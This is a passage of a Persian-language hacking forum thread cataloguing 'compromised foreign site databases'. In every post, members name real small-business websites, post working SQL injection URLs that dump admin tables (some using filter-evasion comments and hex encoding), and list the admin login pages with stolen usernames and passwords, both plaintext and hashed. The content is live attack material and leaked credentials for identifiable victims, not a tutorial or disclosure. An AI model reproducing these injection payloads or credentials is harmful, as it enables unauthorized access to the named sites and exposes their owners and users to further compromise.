پرش به


تصویر

دیتابیس سایت های مورد نفوذ قرار گرفته (خارجی)

اختصاصی

 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
180 پاسخ برای این موضوع

#51 ارسالی 22 آوریل 2016 - 04:10

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 568 ارسال
  Last Visit 4 هفته قبل
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Mr.s

تارگت :

http://www.zetty.co.za/

لینک اینجکت تیبل ادمین :

http://www.zetty.co.za/catalogue.php?catalogue=-schneider%27+UNION+SELECT+1,2,[email protected][email protected]:=0x00%29,%28select%20%280%29%20from%20%28phpgen_users%29%20where%20%280x00[email protected]:[email protected],0x3c62723e,user_name,0x3a,user_password%29%29%29%29x%29,4,5,6,7,8--+

تیبل ادمین :

admin:zxcvfr44
assie:[email protected]
lizeth:[email protected]

لاگین :

http://www.zetty.co.za/admin/login.php

موفق باشید.


دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


#52 ارسالی 28 آوریل 2016 - 11:06

Danger BoY
+2,258
  ONLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Defacer
 • VIP
 • 450 ارسال
  Last Visit 14 ساعت قبل
 • Slogan : Let sit for my progress Movie my enemies
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Just Danger BoY

دیدم تایپیک داره خاک میخوره

========================

 

 

تارگت : http://www.c2-deutschland.de

 

لینک اینجکت : http://www.c2-deutsc...full.php?id=287

 

 http://www.c2-deutsc...0,11,12,13,14--

 

http://www.c2-deutsc...0,11,12,13,14--

 

http://www.c2-deutsc...0,11,12,13,14--

 

http://www.c2-deutsc...schema.tables--

 

========================================================================================================

 

 

http://www.c2-deutsc...=0x61646D696E--

 

 

 

 

http://www.c2-deutsc...14 from admin--


image.gif
Iranonymous Security Team

Danger BoY

++++++++++++++++++++++++++++++++
https://telegram.me/Per_Def
+++++++++++++++++++++++++++++++++
banner-1.gifmahak%282%29%28pr8.ir%29.gif


#53 ارسالی 29 آوریل 2016 - 06:23

Danger BoY
+2,258
  ONLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Defacer
 • VIP
 • 450 ارسال
  Last Visit 14 ساعت قبل
 • Slogan : Let sit for my progress Movie my enemies
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Just Danger BoY
http://www.crom.co.uk/news.php?id=7+order+by+9--


http://www.crom.co.uk/news.php?id=-7+union+select+1,2,3,4,5,6,7,8,9--http://www.crom.co.uk/news.php?id=-7+union+select+1,2,version%28%29,4,5,6,7,8,9--http://www.crom.co.uk/news.php?id=-7+union+select+1,2,database%28%29,4,5,6,7,8,9--
http://www.crom.co.uk/news.php?id=-7+union+select+1,2,group_concat%28table_name%29,4,5,6,7,8,9+from+information_schema.tables--


==============================================================================================================================================================================


http://www.crom.co.uk/news.php?id=-7+union+select+1,2,group_concat%28column_name%29,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x61646D696E--


http://www.crom.co.uk/news.php?id=-7+union+select+1,2,group_concat%28id,0x3a,password%29,4,5,6,7,8,9+from+admin--
image.gif
Iranonymous Security Team

Danger BoY

++++++++++++++++++++++++++++++++
https://telegram.me/Per_Def
+++++++++++++++++++++++++++++++++
banner-1.gifmahak%282%29%28pr8.ir%29.gif


#54 ارسالی 30 آوریل 2016 - 02:24

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 568 ارسال
  Last Visit 4 هفته قبل
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Mr.s

تارگت :

http://www.mirfieldcc.co.uk/

لینک اینجکت :

http://www.mirfieldcc.co.uk/news/index.php?id=-87+UNION+SELECT+1,2,group_concat%280x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e204944203a20,id,0x3c666f6e7420636f6c6f723d6f72616e67653e20456d61696c203a20,loginname,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29,4,5,6,7,8+from+phplist_admin--+

لاگین :

http://www.mirfieldcc.co.uk/admin/

پسورد و یوزر

ID : 1 Email : admin Password : boycott24mcc,
ID : 2 Email : stevekadmin Password : mmg1664,
ID : 3 Email : belmabdi Password : 08101991

موفق باشید/


ویرایش شده توسط Blackwolf_Iran 30 آوریل 2016 - 02:26 .

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


#55 ارسالی 04 مه 2016 - 01:40

Ormazd
+1,631
  ONLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 284 ارسال
  Last Visit 11 ساعت قبل
 • Country :
 • Gender : Male

تارگت :

http://www.bahiatur.net/

 لینک اینجکت :

http://www.bahiatur.net/viagem.php?ref=13&v=-211/*!50000union*//*!50000select*/1,2,3,4,5,/*!50000groUp_cOncat(email,0x3a,passwd)*/,7,8,9,10,11,12%20from%20admin_usuarios

لاگین :

http://www.bahiatur.net/admin/

یوزر و پسورد :

[email protected]:btvt14

:)


به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#56 ارسالی 04 مه 2016 - 02:38

Ormazd
+1,631
  ONLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 284 ارسال
  Last Visit 11 ساعت قبل
 • Country :
 • Gender : Male

تارگت :

http://toplotrade.com/

لینک اینجکت :

http://toplotrade.com/products.php?cat_id=2&subcat_id=-32%20union%20select%200x3c68313e696e6a6563746564206279206f726d617a64203c2f68313e,group_concat(username,0x3a,password),3%20from%20users

لاگین 

http://toplotrade.com/admin/

یوزر ها 

apulchev:360d06396d737f04bb1f2db50709829e
 kliment:c8489eee3b7d9e0abcec120e6790e6bb  : 17dell
milena:d6631b160fd1be0d7fd7ca1bb72b9d4f   : moncler

:-*:)


ویرایش شده توسط Ormazd 04 مه 2016 - 02:39 .

به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#57 ارسالی 06 مه 2016 - 01:10

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 568 ارسال
  Last Visit 4 هفته قبل
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Mr.s

تارگت :

http://www.mercerfarming.co.uk

لینک اینجکت تیبل pp_user :

http://www.mercerfarming.co.uk/news.php?id=-82+UNION+SELECT+1,0x496e6a656374656420427920426c61636b776f6c665f4972616e,(select (@x) from (select (@x:=0x00),(select (0) from (pp_users) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d62726f776e3e20557365726e616d65203a20,user_login,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,user_pass))))x),4--+
	
Username : admin Password : 49ec3313b9460366d1ece2323b8fcbd0
Username : Josie Heath Password : d22670c08c084587c655e9fbae300589

لینک اینجکت mf_user :

http://www.mercerfarming.co.uk/news.php?id=-82+UNION+SELECT+1,0x496e6a656374656420427920426c61636b776f6c665f4972616e,(select (@x) from (select (@x:=0x00),(select (0) from (mf_users) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d62726f776e3e20557365726e616d65203a20,user_login,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,user_pass))))x),4--+
Username : admin Password : 21962afa4d2b1471c5b1c9b40aa18f9d

لینک اینجکت ادمین اصلی :

http://www.mercerfarming.co.uk/news.php?id=-82+UNION+SELECT+1,0x496e6a656374656420427920426c61636b776f6c665f4972616e,(select (@x) from (select (@x:=0x00),(select (0) from (users) where (0x00) in (@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d62726f776e3e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password))))x),4--+
Username : mercer Password : 42b596f332bb139e43948416ef8f456d

لینک لاگین :

http://www.mercerfarming.co.uk/admin/

موفق باشید =)


دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


#58 ارسالی 06 مه 2016 - 06:24

mahi
+22
  OFFLINE
  تاریخ عضویت :
  06 مه 2016
 • %0▒▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 3 ارسال
  Last Visit دسامبر 07 2016 05:42
 • Country :
 • Gender : Female
 • Name : [email protected]

تارگت :

http://www.basicpaper.com

لینک اینجکت :

http://www.basicpaper.com/news.php?id=-78+union+select+1,2,3,4,group_concat%28name,0x3a,pass,0x3c62723e%29,6,7+from+access--+

رمز و پسورد لینک اینجکت :

sander:danser
,vincent:btp
,ruben:tcn

موفق باشید


ویرایش شده توسط Blackwolf_Iran 06 مه 2016 - 06:26 .


#59 ارسالی 07 مه 2016 - 12:05

mahi
+22
  OFFLINE
  تاریخ عضویت :
  06 مه 2016
 • %0▒▒▒▒▒▒▒▒▒▒
 • Anonymous
 • 3 ارسال
  Last Visit دسامبر 07 2016 05:42
 • Country :
 • Gender : Female
 • Name : [email protected]

لینک تارگت:

http://www.coreworld.in

لینک اینجکت:

http://www.coreworld.in/news.php?id=-382+UNION%20SELECT%201,group_concat%28emailid,0x3A,ipassword%29,3,4,5+from+adminlogin--

رمز و پسورد لینک اینجکت:

[email protected]:canyoufindmefucker

موفق باشید.#60 ارسالی 07 مه 2016 - 02:55

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 568 ارسال
  Last Visit 4 هفته قبل
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Mr.s

تارگت :

http://www.thirdcarrickband.co.uk

لاگین :

http://www.thirdcarrickband.co.uk/MusicSearch/login.php

لینک اینجکت یوزرا :

http://www.thirdcarrickband.co.uk/news_item.php?id=-155+UNION+SELECT+1,0x696e6a656374656420427920426c61636b776f6c665f4972616e,[email protected][email protected]:=0x00%29,%28select%20%280%29%20from%20%28allusers%29%20where%20%280x00%29%[email protected]:[email protected],0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e204944203a20,user_id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,user_name,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29%29%29%29x%29,4,5,6,7,8,9--+

لینک اینجکت ادمین :

http://www.thirdcarrickband.co.uk/news_item.php?id=-155+UNION+SELECT+1,0x696e6a656374656420427920426c61636b776f6c665f4972616e,[email protected][email protected]:=0x00%29,%28select%20%280%29%20from%20%28cgc_users%29%20where%20%280x00%29[email protected]:[email protected],0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,user_name,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29%29%29%29x%29,4,5,6,7,8,9--+
user : golfadmin
pass : wood01

موفق باشید.


ویرایش شده توسط Blackwolf_Iran 07 مه 2016 - 02:59 .

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


همچنین به اختصاصی نیز برچسب خورده است

0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP